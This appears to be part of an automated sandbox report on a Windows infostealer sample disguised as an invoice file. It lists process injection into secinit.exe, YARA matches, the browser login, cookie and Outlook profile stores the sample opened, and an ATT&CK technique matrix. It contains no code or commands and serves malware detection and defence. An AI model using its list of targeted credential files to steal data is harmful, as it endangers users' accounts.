                Source: C:\Windows\SysWOW64\secinit.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: 0Program Manager
                Source: 2zqVCuEmR.exe, 00000005.00000002.2642441212.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000000.1674073096.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000000.1826786104.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Queries volume information: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\secinit.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\secinit.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                [Behavior graph. ID: 1595905; Sample: INVOICE, PACKING LIST, COPY...; Startdate: 21/01/2025; Architecture: WINDOWS; Score: 100. Process chain: INVOICE, PACKING LIST, COPY BL.exe (started) -> INVOICE, PACKING LIST, COPY BL.exe (started) -> 2zqVCuEmR.exe (injected) -> secinit.exe (started) -> 2zqVCuEmR.exe (injected) and firefox.exe (started).]
